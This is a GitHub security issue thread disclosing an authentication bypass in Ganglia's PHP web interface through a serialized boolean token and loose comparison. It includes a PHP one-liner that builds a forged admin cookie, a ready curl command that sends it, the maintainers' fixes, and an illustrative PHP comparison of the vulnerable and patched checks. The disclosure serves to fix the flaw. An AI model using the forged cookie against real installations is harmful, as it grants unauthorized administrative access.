
[Security] auth bypass #267

Closed
d0znpp opened this issue Sep 4, 2015 · 9 comments

Comments

d0znpp commented Sep 4, 2015

It's easy to bypass auth by using boolean serialization like this:

```shell
$ php -r "echo urlencode(serialize(array('user'=>'admin', 'group'=>'admin', 'token'=>true)));"
```

Vulnerable code listed below:

```php
if(isSet($_COOKIE['ganglia_auth'])) {
  $cookie = $_COOKIE['ganglia_auth'];
  // magic quotes will break unserialization
  if($this->getMagicQuotesGpc()) {
    $cookie = stripslashes($cookie);
  }
  $data = unserialize($cookie);
  if(array_keys($data) != array('user','group','token')) {
    return false;
  }
  if($this->getAuthToken($data['user']) == $data['token']) {
```

// Found by d90.andrew
// Exploit: curl -H 'Cookie: a%3A3%3A%7Bs%3A4%3A%22user%22%3Bs%3A5%3A%22admin%22%3Bs%3A5%3A%22group%22%3Bs%3A5%3A%22admin%22%3Bs%3A5%3A%22token%22%3Bb%3A1%3B%7D' http://ganglia.local/ganglia/

vvuksan (Member) commented Sep 4, 2015

Thanks for reporting. We'll look into fixing this shortly cc/ @alexdean

alexdean (Member) commented Sep 4, 2015

Phew. Been a while since I was in this code. Sounds like strict equality checking would resolve the problem?

```php
if($this->getAuthToken($data['user']) === $data['token']) {
```

d0znpp (Author) commented Sep 7, 2015

Yes. But I strongly recommend replacing unserialize() with json_decode().

zveriu commented Sep 10, 2015

Jehops commented Oct 1, 2015

Is there an ETA for a fix?

alexdean (Member) commented Oct 1, 2015

I think the fix I mentioned above will be sufficient, but I don't have a dev environment set up to confirm with. I don't think it's likely I'll have time to set one up in the near future.

vvuksan (Member) commented Oct 1, 2015

Per d0znpp's suggestion I will be changing serialization to use json_encode/decode.
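The following is an added illustration, not Ganglia's code, showing why the cookie check quoted in the opening post is bypassable (PHP's loose `==` treats any non-empty string as equal to `true`) and how both proposed fixes, alexdean's strict comparison and the json_decode() replacement, close it. `getAuthToken()` is a hypothetical stand-in for the real method, with a constructed secret; PHP 7+ is assumed.

```php
<?php
// Hypothetical stand-in for Ganglia's getAuthToken(): a per-user token derived
// from a constructed server secret (the real derivation is not shown here).
function getAuthToken(string $user): string {
    return hash_hmac('sha256', $user, 'hypothetical-server-secret');
}

// Original logic: unserialize() plus loose comparison. A serialized boolean
// true (b:1) as the token compares equal to every non-empty token string,
// so the check passes for any user name without knowing the real token.
function checkCookieOriginal(string $cookie): bool {
    $data = unserialize($cookie);
    if (!is_array($data) || array_keys($data) != array('user', 'group', 'token')) {
        return false;
    }
    return getAuthToken($data['user']) == $data['token'];
}

// Fix 1 (strict comparison): a boolean can never be === a string. The token
// is type-checked first, and hash_equals() makes the comparison constant-time.
// allowed_classes=false stops unserialize() from instantiating objects.
function checkCookieStrict(string $cookie): bool {
    $data = unserialize($cookie, ['allowed_classes' => false]);
    if (!is_array($data) || array_keys($data) !== array('user', 'group', 'token')) {
        return false;
    }
    return is_string($data['user']) && is_string($data['token'])
        && hash_equals(getAuthToken($data['user']), $data['token']);
}

// Fix 2 (JSON instead of PHP serialization): json_decode() never creates
// objects, and the same strict, type-checked comparison is applied.
function checkCookieJson(string $cookie): bool {
    $data = json_decode($cookie, true);
    if (!is_array($data) || array_keys($data) !== array('user', 'group', 'token')) {
        return false;
    }
    return is_string($data['user']) && is_string($data['token'])
        && hash_equals(getAuthToken($data['user']), $data['token']);
}

// Constructed inputs: the boolean-token cookie from the report, a legitimate
// cookie, and the JSON equivalent of the boolean-token cookie.
$forged    = serialize(array('user' => 'admin', 'group' => 'admin', 'token' => true));
$legit     = serialize(array('user' => 'admin', 'group' => 'admin', 'token' => getAuthToken('admin')));
$forgedJson = json_encode(array('user' => 'admin', 'group' => 'admin', 'token' => true));

var_dump(checkCookieOriginal($forged)); // passes: the bypass
var_dump(checkCookieStrict($forged));   // rejected
var_dump(checkCookieStrict($legit));    // accepted only with the real token
var_dump(checkCookieJson($forgedJson)); // rejected
```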

vvuksan closed this as completed in f8cc170 on Oct 1, 2015
vvuksan (Member) commented Oct 1, 2015

I will try to get a release published by Friday 10/2/2015

Jehops commented Oct 2, 2015

FreeBSD port updated.
Thanks
